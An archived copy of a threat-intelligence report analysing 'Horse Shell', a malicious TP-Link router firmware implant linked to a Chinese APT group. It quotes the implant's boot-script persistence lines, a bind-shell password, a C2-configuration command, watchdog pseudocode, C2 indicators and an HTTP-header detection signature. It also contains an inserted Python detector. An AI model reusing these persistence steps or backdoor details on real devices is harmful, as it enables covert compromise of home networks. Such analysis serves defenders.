{
	"id": "39cc2b4f-ebb0-4fbe-9dd6-c3f744ae601b",
	"created_at": "2026-04-14T02:22:24.564522Z",
	"updated_at": "2026-04-14T17:01:38.806648Z",
	"deleted_at": null,
	"sha1_hash": "13c5456ff4455241428ebd8ebd5277ac5b53fb90",
	"title": "The Dragon Who Sold His Camaro: Analyzing Custom Router Implant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 207934,
	"plain_text": "The Dragon Who Sold His Camaro: Analyzing Custom Router Implant\r\nBy itayc\r\nPublished: 2023-05-16 · Archived: 2026-04-14 02:06:10 UTC\r\nResearch by: Itay Cohen, Radoslaw Madej, and the Threat Intelligence Team\r\nOver the past few months, Check Point Research has closely monitored a series of targeted attacks aimed at European foreign affairs entities. These campaigns have been linked to a Chinese state-sponsored APT group we track as Camaro Dragon, which shares similarities with previously reported activities conducted by state-sponsored Chinese threat actors, namely Mustang Panda.\r\nOur comprehensive analysis of these attacks has uncovered a malicious firmware implant tailored for TP-Link routers. The implant features several malicious components, including a custom backdoor named “Horse Shell” that enables the attackers to maintain persistent access, build anonymous infrastructure and enable lateral movement into compromised networks.\r\nThe discovery is yet another example of a long-standing trend of Chinese threat actors to exploit Internet-facing network devices and modify their underlying software or firmware. This blog post will delve into the intricate details of analyzing the “Horse Shell” router implant. We will share our insights into the implant’s functionality and compare it to other router implants associated with Chinese state-sponsored groups. By examining this implant, we hope to shed light on the techniques and tactics utilized by the Camaro Dragon APT group and provide a better understanding of how threat actors utilize malicious firmware implants in network devices in their attacks.\r\nKey Findings\r\nCheck Point Research has discovered and analyzed a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”.\r\nThe firmware image contained several malicious components, including a custom MIPS32 ELF implant dubbed “Horse Shell”. 
In addition to the implant, a passive backdoor providing attackers with a shell to infected devices was found.\r\n“Horse Shell”, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\nRemote shell — Execution of arbitrary shell commands on the infected router\r\nFile transfer — Upload and download files to and from the infected router.\r\nSOCKS tunneling — Relay communication between different clients.\r\nDue to its firmware-agnostic design, the implant’s components can be integrated into various firmware by different vendors.\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 1 of 45\n\nThe deployment method of the firmware images on the infected routers is still unclear, as well as its usage and involvement in actual intrusions.\r\nBackground\r\nSince January 2023, Check Point Research has been tracking sophisticated attacks targeting officials in multiple European countries. The campaign leveraged a wide variety of tools, among them implants commonly associated with Chinese state-sponsored threat actors. This activity has significant infrastructure overlaps with activities publicly disclosed by our fellow researchers in Avast and ESET, linking it to “Mustang Panda”. This cluster of activity is currently tracked by CPR as “Camaro Dragon”.\r\nThrough our detailed analysis of files and infrastructure associated with this campaign, we have discovered a trove of files and payloads used by the group. Among these files, there were two that caught our attention. These were two modified TP-Link router firmware images. As we dug further, it became evident those were tampered with, adding several malicious components to the original firmware, including a custom implant dubbed “Horse Shell”.\r\nThe implanted components were discovered in modified TP-Link firmware images. 
However, they were written in a firmware-agnostic manner and are not specific to any particular product or vendor. As a result, they could be included in different firmware by various vendors. While we have no concrete evidence of this, previous incidents have demonstrated that similar implants and backdoors have been deployed on diverse routers and devices from a range of vendors.\r\nUncovering the Implants\r\nWhen faced with a large number of files, it is necessary to quickly triage and filter them to identify those that are more relevant for further inspection. To do this, there are several strategies that can be employed, one of which involves understanding the type of files that are being dealt with.\r\nIt is important to note that certain file types are more likely to contain relevant information than others. For instance, graphic images and icons may not be as significant as executable and firmware files. Therefore, to filter through the large number of files in question, we decided to employ the Linux file command, which helped us determine the file types.\r\nUpon running the command, we discovered that two of the files were TP-Link firmware images of a rather dated model, WR940, that was initially released around 2014.\r\n9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...]\r\n9406.bin: firmware 940 v6 TP-LINK Technologies ver. 
1.0, version 3.20.1, [...]\r\nThe output of our query showcased that both files pertained to the same model of TP-Link router, albeit intended for different hardware versions, specifically v4 and v6, respectively. The presence of these router firmware files, situated alongside dubious files and tools at the hands of an advanced threat actor, undoubtedly raised suspicion and warranted a thorough investigation.\r\nAs the firmware claimed to be for the TP-Link router model WR940N, we aimed to compare the original firmware of both v4 and v6 with the ones we had obtained, analyzing any potential differences. To do so, we procured the original firmware for this model from the TP-Link website, meticulously scrutinizing each component to identify any discrepancies.\r\nUpon inspection, we discovered that the kernel and the uBoot of both firmware versions were identical, indicating that they had not been tampered with by the attackers. However, the filesystems were notably distinct, prompting us to extract and compare them. The firmware uses a custom implementation of SquashFS. To extract the filesystem we used sasquatch. We then carried out a meticulous file-by-file comparison, aiming to identify which files had been modified, added, or removed, if any.\r\nBy conducting a meticulous analysis of each file, we aimed to discern which files had been modified, added, or removed from the suspicious firmware we had encountered. 
In doing so, we hoped to uncover any potential alterations made by the threat actor.\r\nAnd indeed, we found that multiple files were added to the firmware we obtained, and a couple of files were modified:\r\nFiles added:\r\n/usr/bin/sheel\r\n/usr/bin/shell\r\n/usr/bin/timer\r\n/usr/bin/udhcp\r\nFiles modified:\r\n/etc/rc.d/rcS\r\n/web/userRpm/SoftwareUpgradeRpm.htm\r\nFigure 1: Overview of the different components in the malicious implant.\r\nInitial Infection\r\nWe are unsure how the attackers managed to infect the router devices with their malicious implant. It is likely that they gained access to these devices by either scanning them for known vulnerabilities or targeting devices that used default or weak and easily guessable passwords for authentication. The goal of the attackers appears to be the creation of a chain of nodes between main infections and real command and control, and if so, they would likely be installing the implant on arbitrary devices with no particular interest.\r\nIt is worth noting that this kind of attack is not aimed specifically at sensitive networks, but rather at regular residential and home networks. Therefore, infecting a home router does not necessarily mean that the homeowner was a specific target, but rather that their device was merely a means to an end for the attackers.\r\nInspecting the Modified Files\r\nSoftwareUpgradeRpm.htm\r\nThe TP-Link router, like many routers, has a web interface that allows its users to configure the router and manage it. One of the features of the management website provides the user with the option to manually upgrade their device’s firmware version. 
The web form for uploading a new firmware exists in SoftwareUpgradeRpm.htm. This page, on the original and legitimate firmware we obtained from the official TP-Link website, is shown in the image below.\r\nFigure 2: SoftwareUpgradeRpm.htm as shown in the original interface\r\nHowever, in the modified version of the firmware we obtained, a small inline CSS property was added to the HTML form. This property, display:none, hides the form from a user entering the page.\r\n\u003cFORM action=\"../incoming/Firmware.htm\" enctype=\"multipart/form-data\" method=\"post\" onSubmit=\"return doSubmit();\" style=\"display: none;\"\u003e\r\nHiding the form does not remove it or the feature from the HTML itself, so users can technically still manually upgrade their firmware version. However, it is now harder to perform the upgrade or even to know that this feature exists.\r\nFigure 3: The malicious image hides from a user the ability to flash another firmware image\r\n/etc/rc.d/rcS\r\nThe attackers modified /etc/rc.d/rcS, which is part of the operating system’s boot scripts. 
To this initialization script, the attackers added the following three shell commands to execute three of the files added to the modified firmware.\r\n/usr/bin/udhcp \u0026\r\n/usr/bin/shell \u0026\r\n/usr/bin/timer 60 \u0026\r\nThe rcS script is usually one of the first scripts to be executed during the system boot process, as it performs tasks that are essential to bringing up the rest of the system. Upon system boot-up, the rcS script would automatically launch all three binaries, thereby ensuring the persistence of the infection on the compromised device.\r\nAnalyzing the Added Files\r\nBy now, we saw that the attackers modified two files and added 4 files to the altered router firmware, 3 of which are executed by the modified initialization script. To understand what they do, we need to analyze each of the files. Since the router is a MIPS device, the binaries we’ll analyze are all compiled for the MIPS32BE architecture. Let’s start.\r\nshell — Passive Backdoor\r\nThe shell binary is a simple password-protected bind shell that will bind to all IPv4 network interfaces on port 14444. The password can be revealed with the highly advanced, exceedingly unique tool called strings. Should you require the password, simply run the following command:\r\n$ strings shell\r\n[..]\r\npassword:\r\nJ2)3#4G@Iie\r\nsuccess!\r\n
/bin/sh\r\n[..]\r\nAs you can see, the password is hidden away in plain sight, waiting to be extracted by the adept researcher. With this information in hand, access to the elusive shell is granted, allowing for unrestricted entry into the system. May the force be with strings!\r\nsheel\r\nThe sheel binary is a utility for configuration writing and reading. It was meant to be executed manually, as it wasn’t written to the modified init script. It reads and writes to the /dev/mtdblock4 device. Why would it do so, a curious reader might ask? Before we answer this question, we first need to set the scene. The /dev/mtdblock4 partition on this particular model of the router is in fact a so-called ART partition, which stands for Atheros Radio Test. It is supposed to contain calibration data for the WiFi chipset.\r\nCuriously, the sheel binary uses this partition to store data in a raw format. And not just any data – its purpose is to write and read the C2 domains used by the main implant (udhcp), which is described further below. The obvious reason for writing data in a raw format on a block device is to make it less likely to be spotted by a router administrator.\r\nThe sheel binary allows writing the addresses of up to five C2 servers inside the partition. 
In case the operator didn’t know how to use it, the authors included a helpful hint, even marking the optional arguments in brackets:\r\n./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\r\ntimer\r\nThe timer executable is a basic watchdog that is initiated during the boot process. It operates by attempting to execute the added udhcp executable at regular intervals, where the length of these intervals is determined by a number passed to it as a command line argument. The udhcp executable is the main implant in the modified firmware, as we will discuss shortly. When udhcp is launched, it verifies the presence of a file named /var/udhcp. If the file exists and is locked, udhcp terminates as it understands that another instance of itself is already running. However, if it does not exist, udhcp creates the file and writes its own process ID to it. 
The timer binary, by executing udhcp again and again, provides an additional layer of persistence, ensuring that the primary implant remains active.\r\nThe implementation is very simple, and as reconstructed pseudo-code it looks like this:\r\nint32_t main(int32_t argc, char** argv, char** envp)\r\n{\r\n    daemon(1, 0);                  // detach from the terminal, keep cwd, close stdio\r\n    int32_t seconds;\r\n    if (argc \u003e= 2)\r\n    {\r\n        seconds = atoi(argv[1]);   // interval from the command line (rcS passes 60)\r\n    }\r\n    else\r\n    {\r\n        seconds = 3600;            // default interval: one hour\r\n    }\r\n    while (true)\r\n    {\r\n        sleep(seconds);\r\n        system(\"/usr/bin/udhcp\");  // udhcp itself exits if /var/udhcp shows it is already running\r\n    }\r\n}\r\nAnalyzing Horse Shell (udhcp)\r\nThe udhcp file is the main implant inserted into the modified firmware by the attackers. Parts of it are internally named Horse Shell, so we use that name for the implant as a whole. The implant provides the attacker with 3 main functionalities: remote shell, file transfer, and tunneling.\r\nIn the following parts, we will dive deeper into the implementation of the different components; we’ll explain the functionality of Horse Shell and how it is implemented.\r\nStatic Analysis\r\nudhcp is a binary compiled for a MIPS32 MSB operating system and written in C++. 
Many embedded devices and routers are running MIPS-based operating systems, and TP-Link routers are no different.\r\n$ file ./udhcp\r\nudhcp: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped\r\nEven though the implant is not easy to analyze, the static information embedded in it makes the analysis a little bit simpler. In spite of it being shown as “stripped”, it is full of meaningful strings such as source file names, debug log messages, function names, names of global variables, and assert messages. Executing strings against the binary will reveal meaningful information that can give a researcher a good idea of what they’re dealing with.\r\nInitializing\r\nHorse Shell execution begins by instructing the system not to terminate it when receiving the SIGPIPE, SIGINT or SIGABRT signals. Then it calls a function named horse_main, which is the main function of the implant. In this context, “horse” may refer to Trojan Horse.\r\nUpon invocation, the implant issues a daemon(1, 0) call, which instructs the operating system to detach it from the controlling terminal and run it in the background as a daemon. It then verifies the existence of the file /var/udhcp. If the file exists, Horse Shell assumes that another instance of the implant is already running and immediately terminates. 
Conversely, if the file is non-existent, the implant creates it, setting its permissions to rw-r--r--. The newly created file then serves as a type of mutex that Horse Shell writes the current PID to, helping to avoid concurrency issues.\r\nThe implant creates a file /var/udhcp.cnf and writes the command kill -9 [PID] to it, [PID] being udhcp’s process ID. It’s unclear how the file is used or what purpose it serves. One suggestion is that it can be used by the attackers to easily terminate the running implant.\r\nConfiguration\r\nMost of Horse Shell’s configuration is hard coded. However, some of the entries are dynamically configurable. The instance obtained by us is using m.cremessage[.]com on port 80 as its default command and control server. It will write this domain to /dev/mtdblock4. For non-default peers, it reads a list of peer hosts from /dev/mtdblock4. On an actively infected device, this MTD block can contain values inserted into it by using the aforementioned sheel utility, or by old versions of the implant that were flashed to the device. It will resolve every host to its IP address and check if it’s up and running. If it is, it will continue the initialization of the configuration.\r\nHorse Shell operates as a single-threaded application and adopts an event-driven methodology to direct its execution. It makes extensive use of the open-source library libev for I/O events and invokes callback functions in response to specific events. In essence, the program’s progression is dictated by the events that occur, hence analyzing the implant warrants consideration of the events and their associated callbacks. 
During the configuration initialization phase, it sets up various events and associates callbacks to respond to circumstances such as reading and writing to sockets or establishing a connection.\r\nIn its configuration, the implant stores information such as the IPs and ports of the command and control servers, initialized libev structures for network and timer events, the cryptographic context, callbacks, pointers to important structures like a linked list that holds active connections, etc.\r\nInitial Connection\r\nUpon finishing configuring itself, Horse Shell will start an ev_timer structure that will trigger a callback function periodically. When triggered, the function will check when it was last executed, and send a heartbeat message to all the established connections.\r\nThen, the implant will try to connect to the command and control. When the initial connection is successfully established, Horse Shell will send the peer a list of information about the infected device. This information is sent frequently and not only once. The information sent by the implant contains:\r\nUser name\r\nSystem name\r\nOS version\r\nOS time\r\nCPU architecture\r\nNumber of CPUs\r\nTotal RAM\r\nIP address\r\nMAC address\r\nFeatures supported by the implant (remote shell, tunneling, file transfer)\r\nNumber of active connections\r\nSome of the information sent, such as supported functionalities and CPU architecture, can suggest that the implant has other versions that support different devices (i.e. non-MIPS devices) and a different set of functionalities.\r\nCommunication\r\nHorse Shell communicates with its peers and server on a port specified for each of them individually. By default, it is using port 80 for communication. Regardless of the port, it uses HTTP communication with hard-coded HTTP headers. 
Every communication by the implant is encrypted using a custom or modified encryption scheme that is based on a Substitution-Permutation Network. Every message is encrypted upon sending and decrypted when it arrives at the implant.\r\nA request sent from the implant will have this structure:\r\nPOST http:/[domain]/index.php HTTP/1.1\r\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*\r\nAccept-Language: en-US, zh-CN;q=0.5\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nAccept-Encoding: gzip, deflate\r\nHost: 
[domain]\r\nConnection: Keep-Alive\r\n[encrypted message]\r\nThe hard-coded headers haven’t much to do with the actual data sent. In fact, searching this header online led us to see the exact same HTTP headers on several coding forums and repositories on Chinese websites like CSDN. The Accept-Language header field in all messages transmitted from the implant includes the language code zh-CN, except for one instance. This occurs when the implant sends its initial transmission message containing details about the compromised device, where the Chinese language code is absent from the request. Instead, the attackers have included the HTTP headers with Accept-Language: en-US. It is possible that the attackers intentionally omitted the language code from the request to conceal any indication of their identity that might be inferred from the language used.\r\nHorse Shell is designed to communicate with numerous peers simultaneously. As it lacks multi-threading capabilities, the program employs list containers to segregate the various connected peers as individual list items. Each peer has a distinct structure, with assigned events and callbacks specific to it. This approach guarantees that the communication with each peer remains distinct, utilizing its unique callbacks and event handlers, and does not become intertwined with other peers.\r\nThe message structure differs between different types of communication conducted by the implant. Although the overall structure is similar, each functionality within the implant has its distinct nuances and particulars. For instance, the structure of communication related to tunneling will differ from that of a remote shell. 
However, the HTTP header in the requests remains consistent across all communication types.\r\nCommands and Functionalities\r\nEach functionality has its own list of supported commands. When a new connection is received, it will be parsed and handled by the callback function that handles read events triggered from the peer’s socket. It will check if the packet is requesting to open a new type of connection from the following options:\r\nCommand | Subcommand | Description\r\n0x1 | 0x2 | Start remote shell (“Horse Shell”)\r\n0x2 | 0x2 | Start SOCKS tunneling\r\n0x3 | 0x2 | Start file transfer\r\nRemote Shell\r\nWhen a peer requests to initiate a new remote shell instance, the program will verify the existence of /bin/bash or /bin/sh on the device. If either of them exists, the program will generate a new session using the tsession structure implementation from the Telnet open-source project. This Telnet-based connection provides the attacker with complete shell access to the compromised device.\r\nIt’s important to note that the remote shell feature utilizes an embedded Telnet library while it still functions through the implant’s HTTP-based communication. However, the communication between the compromised device and the peer seems unencrypted.\r\nSupported commands\r\nCommand ID | Name | Description\r\n0x1 | REQ_CONNECT_PORT | Create a new shell connection\r\nFile Transfer\r\nThe file transfer module supports downloading and uploading files to and from the infected device, as well as basic file manipulation functionality.\r\nThis functionality is important as the attackers may need to upload new modules or tools onto a compromised system to perform specific tasks, such as conducting reconnaissance, stealing data, or moving laterally within a target network. 
These modules or tools may be customized for the specific target or scenario, and may not be present on the compromised system initially.\r\nIn addition, although not very useful for devices such as routers, the threat actors can use this module for data exfiltration or to collect different logs from the device.\r\nSupported commands\r\nCommand ID | Name | Description\r\n0x1 | FILE_TRANSFER_REQ_CONNECT_PORT | Initiate connection\r\n0x2 | FILE_TRANSFER_OPER_UPLOAD_CHECK | Check for active upload task\r\n0x3 | FILE_TRANSFER_OPER_DOWNLOAD_CHECK | Check for active download task\r\n0x4 | FILE_TRANSFER_OPER_QUERY | Query directory list\r\n0x6 | FILE_TRANSFER_OPER_DELETE | Delete a file from the device\r\n0x7 | FILE_TRANSFER_OPER_UPLOAD | Create a file on the device\r\n0x8 | FILE_TRANSFER_OPER_DOWNLOAD | Download a file from the device\r\n0x9 | FILE_TRANSFER_OPER_CHECK_EXISTS | Check if the file exists\r\n0xa | FILE_TRANSFER_OPER_CANCEL_UPLOAD | Cancel upload task\r\n0xb | FILE_TRANSFER_OPER_CANCEL_DOWNLOAD | Cancel download task\r\n0xc | FILE_TRANSFER_TRANS_FILE_DATA | Write file contents to the device\r\n0x14 | REQ_MODULE_HEARTBEAT | Heartbeat\r\nTunneling\r\nThe implant can relay communication between two nodes. By doing so, the attackers can create a chain of nodes that will relay traffic to the command and control server. This lets the attackers hide the final command and control, as every node in the chain has information only on the previous and next nodes, each node being an infected device. Only a handful of nodes will know the identity of the final command and control.\r\nBy using multiple layers of nodes to tunnel communication, threat actors can obscure the origin and destination of the traffic, making it difficult for defenders to trace the traffic back to the C2. 
This makes it harder for defenders to detect and respond to the attack.\r\nIn addition, a chain of infected nodes makes it harder for defenders to disrupt the communication between the attacker and the C2. If one node in the chain is compromised or taken down, the attacker can still maintain communication with the C2 by routing traffic through a different node in the chain.\r\nSupported commands\r\nCommand ID | Name | Description\r\n0x1 | SOCKS_TUN_REQ_CONNECT_PORT | Check if the port is available for connection\r\n0x4 | SOCKS_TUN_NATPORT_COMM_CMD_OPEN | Open connection on port\r\n0x5 | SOCKS_TUN_NATPORT_COMM_CMD_CONNECT | Establish a connection between two nodes ip1:port1 \u003c–\u003e ip2:port2\r\n0x6 | SOCKS_TUN_NATPORT_COMM_CMD_DATA | Transfer data between connected nodes\r\n0x7 | SOCKS_TUN_NATPORT_COMM_CMD_DISCONNECT | Disconnect tunnel between two nodes\r\n0x8 | SOCKS_TUN_NATPORT_COMM_CMD_CLOSE | Mark tunnel as closed\r\n0xa | SOCKS_TUN_NATPORT_COMM_CMD_CHECK | Check for new commands\r\n0x14 | SOCKS_TUN_REQ_MODULE_HEARTBEAT | Heartbeat\r\nCharacteristics\r\nRouter implants are not something very popular. Sure, there are infamous malware like Mirai and its numerous offshoots, and a handful of Linux-based botnets still lingering out there, but let’s be honest – it’s not exactly the most happening party in town.\r\nHowever, in recent years we see Chinese threat actors’ increasing interest in compromising edge devices, aiming to both build resilient and more anonymous C\u0026C infrastructures and to gain a foothold in certain targeted networks. 
In the following section, we list some interesting and unique development decisions taken by the Horse Shell developers and compare them to another well-known implant used by the Chinese espionage group APT31.\r\nUsage of Open Source Projects\r\nThe implant smartly integrates multiple open-source libraries in its code. Its remote shell is based on Telnet, events are handled by libev, it embeds libbase32 and ikcp, and its list containers are based on Tor’s smartlist implementation. It may have drawn inspiration from other projects such as Shadowsocks-libev and udptun for some of its functionality. Even its exact HTTP headers were taken from open-source repositories.\r\nStructures and Event-driven flow\r\nHorse Shell’s functionality isn’t groundbreaking, but it certainly isn’t run-of-the-mill either. However, its reliance on libev to create a complex event-driven program, and its penchant for complex structures and list containers, make our job of analyzing it all the more challenging. But, let’s not mince words – the code quality is impressive, and the implant’s ability to handle multiple tasks across a range of modules and structures demonstrates the kind of advanced skills that make us stand up and take notice.\r\nUnused Code\r\nThe vast majority of the functions in the implant are used. However, a thorough examination revealed certain functions and submodules that have been neglected and left unused, like a lone sock lost in the laundry. We saw unused functions from the JSON and IKCP open-source libraries, custom functions built for UDP handling, and more.\r\nWhile it’s possible that these forsaken functionalities are simply leftovers from earlier versions or perhaps orphans that belong to other variants for different devices, their purpose remains a mystery to us.\r\nCustom Crypto\r\nOh, the thrill of creating your very own cryptographic scheme! 
But alas, it’s not typically the wisest endeavor. However, the daring individuals behind Horse Shell have forged ahead with a custom or tweaked encryption scheme built upon a Substitution-Permutation Network. The implant uses this scheme to encrypt and decrypt the data it transmits and receives.\r\nDespite this being far from a best practice, we must begrudgingly admit that our investigations have thus far failed to reveal any conspicuous flaws in the implementation.\r\nComparison to Other Implants\r\nThe Horse Shell implant is written in C++ and compiled for MIPS32-based operating systems. There aren’t many implants written for network devices, so we went looking for other examples to see if the implant we’re looking at is a variant of an already known implant. Spoiling the surprise, we were unable to find another implant that we could confidently classify as a version of Horse Shell. Nonetheless, we did come across other implants that share some similarities and were also associated with Chinese state-sponsored actors. It remains unclear whether they are different variations of the same implant or not.\r\nIn July 2021, CERT-FR reported a large campaign conducted by the Chinese-affiliated threat actor APT31. They discovered that the actor used a mesh network of compromised routers orchestrated using malware they dubbed “Pakdoor”. A follow-up report released in December 2021 shares more information about the campaign as well as a technical analysis of Pakdoor. Security researcher @imp0rtp3 thoroughly analyzed Pakdoor and shared their great analysis on their blog.\r\nLike Horse Shell, the Pakdoor implant also infects MIPS router devices, uses an event-driven execution flow based on libev, and makes heavy use of structs and open-source libraries. 
It seems the two implants share the same goal of tunneling information between nodes as part of a chain of infected devices. The two also have the capability to act as a Remote Access Tool, providing the attacker with a remote shell on the infected device. The code itself, however, isn’t similar between the two implants, although they share some design and architectural decisions.\r\nWe don’t know for sure whether the two implants were written by the same developers and we don’t have evidence to suggest that this is the case. Pakdoor was used by APT31 and Horse Shell was seen in an operation by Camaro Dragon, two seemingly distinct groups.\r\nAttribution\r\nWe found the Horse Shell implant while analyzing sophisticated attacks targeting officials in multiple European countries. The campaign leveraged a wide variety of tools, among them tools commonly associated with Chinese state-sponsored threat actors. The activity we analyzed has significant overlaps with activities publicly disclosed by Avast and ESET, linking it to the Chinese-affiliated APT group “Mustang Panda”. We attribute this activity to a Chinese state-sponsored group we call Camaro Dragon. There is enough evidence to suggest that Camaro Dragon has significant overlaps with Mustang Panda, but we can’t say that this is a full overlap or that these two are the exact same group.\r\nFollowing are some aspects worth paying attention to regarding the attribution of the tool.\r\nServer and infrastructure\r\nNot only did we find the implant on a server related to the Camaro Dragon activity, we also found that the IP address (91.245.253[.]72) to which Horse Shell’s C\u0026C resolves is listed in Avast’s report on their analysis of the Mustang Panda campaign. 
Given the significant overlaps between Mustang Panda and the group we call Camaro Dragon, it is likely that the router implant was deployed by other campaigns of the group.\r\nChinese HTTP Request\r\nWe described how Horse Shell uses hard-coded HTTP headers when it transmits data from the infected device. When we searched for these headers online we found the exact same HTTP headers appearing on several Chinese websites like CSDN, in what seem to be rather esoteric posts. We did not find the same headers on global forums and platforms such as GitHub or Stack Exchange. This suggests that the authors of the implant may have searched for these headers on Chinese forums or used Chinese search queries to arrive at these examples.\r\nTypos\r\nAs we started analyzing Horse Shell, we understood very quickly that the binary is full of debug logs and string artifacts. When doing attribution we try to pay a lot of attention to the language used by the attackers in their implants. While overall the level of English in the implant was quite good, we did notice some typos, some of them repeated again and again across different functions and log strings in the binary. 
Some of them are:\r\n“tatal len” — instead of “total”\r\n“call file_get_http_filed” — instead of “field”\r\n“s_dbgMsg = “write pid faile.” — instead of “failed”\r\n“file transfer download open file %s fialed!” — instead of “failed”\r\n“delete file:%s fialed,open fialed ret=%d” — instead of “failed”\r\n“unkown file transfer sub cmd” — instead of “unknown”\r\n“not enough sapce to save lan ipv4 and port” — instead of “space”\r\n“not enough sapce to malloc a port relay info!” — instead of “space”\r\nSuch mistakes can suggest that the authors of the implant are not native English speakers, as these mistakes should be very visible to developers with a higher level of written English.\r\nVictims\r\nOur investigation of the Camaro Dragon activity was of a campaign targeted mainly at European foreign affairs entities. However, even though we found Horse Shell on the attacking infrastructure, we don’t know who the victims of the router implant are. Learning from history, router implants are often installed on arbitrary devices of no particular interest, with the aim of creating a chain of nodes between the main infections and the real command and control. In other words, infecting a home router does not mean that the homeowner was specifically targeted, but rather that they are only a means to a goal.\r\nFocus on Network Devices\r\nEarlier in this report we discussed similarities between Horse Shell and another MIPS router implant called Pakdoor (or SoWat). Although the two share some commonalities, it is unclear whether one was developed from the other or if these are two distinct malware implants. 
Nevertheless, Pakdoor — deployed by the Chinese state-sponsored group APT31 — together with other known instances of zero-day exploits and custom firmware and backdoors for routers and security gateways, demonstrates that such capabilities and types of attacks are a consistent interest and focus of Chinese-affiliated threat actors.\r\nDetection and Protection\r\nThe discovery of Camaro Dragon’s malicious implant on TP-Link routers highlights the need for individuals and organizations to take measures to protect themselves from similar attacks. Here are some protection and detection recommendations.\r\nNetwork Protections\r\nHorse Shell communicates with its peers using HTTP with hard-coded headers. Although the headers were most likely copied from online forums, the combination is quite unique and can be used to detect communication from potentially infected devices. Traffic using this user agent is likely to be malicious. 
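One way to apply that fingerprint in detection logic, as an added example that is not part of the original report: the Python below parses captured HTTP request heads, matches them against the header set quoted in this section, and grades a user-agent-only hit lower than a full match, since the report notes the headers were copied from public forum posts. The sample requests and the host names c2.example and intranet.example are constructed for the demonstration.

```python
# Added example, not code from the report or from Check Point Research: grades
# captured HTTP request heads against the hard-coded Horse Shell headers quoted
# in the report. The sample requests and host names below are constructed.
from typing import Dict, Optional, Tuple

# User agent and Accept list copied from the request quoted in the report.
HORSE_SHELL_UA = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; "
    "qdesk 2.4.1265.203; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; "
    ".NET CLR 3.0.30729; InfoPath.3)"
)
HORSE_SHELL_ACCEPT = (
    "image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, "
    "image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, "
    "application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*"
)
# The other fixed headers that accompany the user agent in the implant's request.
HORSE_SHELL_HEADERS = {
    "accept": HORSE_SHELL_ACCEPT,
    "accept-language": "en-US",
    "accept-encoding": "gzip, deflate",
    "connection": "Keep-Alive",
}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, target, headers).

    Header names are lower-cased. A folded continuation line (leading space
    or tab) is joined onto the previous header, so a request whose long Accept
    or User-Agent value was wrapped, as in the report's quote, still parses.
    """
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    last: Optional[str] = None
    for line in lines[1:]:
        if not line:
            break  # blank line ends the head; a body would follow
        if line[0] in " \t" and last is not None:
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return method, target, headers


def classify_request(raw: str) -> Optional[str]:
    """Return "high", "medium" or None for one raw request head.

    "high": the user agent, the remaining fixed headers and the POST .../index.php
    shape all match. "medium": only the user agent matches; the report notes the
    headers came from public forum posts, so a lone hit is reviewed, not blocked.
    """
    method, target, headers = parse_request(raw)
    if headers.get("user-agent") != HORSE_SHELL_UA:
        return None
    others = all(headers.get(k) == v for k, v in HORSE_SHELL_HEADERS.items())
    shape = method == "POST" and target.endswith("/index.php")
    return "high" if others and shape else "medium"


SAMPLES = {  # constructed request heads; c2.example / intranet.example are placeholders
    "implant": (
        "POST http://c2.example/index.php HTTP/1.1\r\n"
        "Accept: " + HORSE_SHELL_ACCEPT + "\r\n"
        "Accept-Language: en-US\r\n"
        "User-Agent: " + HORSE_SHELL_UA + "\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Host: c2.example\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    ),
    "benign_ie8": (  # a genuine IE8 agent without the qdesk token: no hit
        "GET /index.php HTTP/1.1\r\n"
        "Host: intranet.example\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
        "Accept: text/html, */*\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    ),
    "ua_only": (  # the user agent alone on a GET: review, not block
        "GET /update.xml HTTP/1.1\r\n"
        "Host: intranet.example\r\n"
        "User-Agent: " + HORSE_SHELL_UA + "\r\n"
        "Accept: */*\r\n\r\n"
    ),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {classify_request(raw)}")
```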
Use such a detection signature with caution, as in theory it can block non-malicious traffic.\r\nPOST http://[host name]/index.php HTTP/1.1\r\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; qdesk 2.4.1265.203; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nAccept-Encoding: gzip, deflate\r\nHost: [host name]\r\nConnection: Keep-Alive\r\nSoftware Updates\r\nIt’s important to keep your network devices’ firmware up-to-date. 
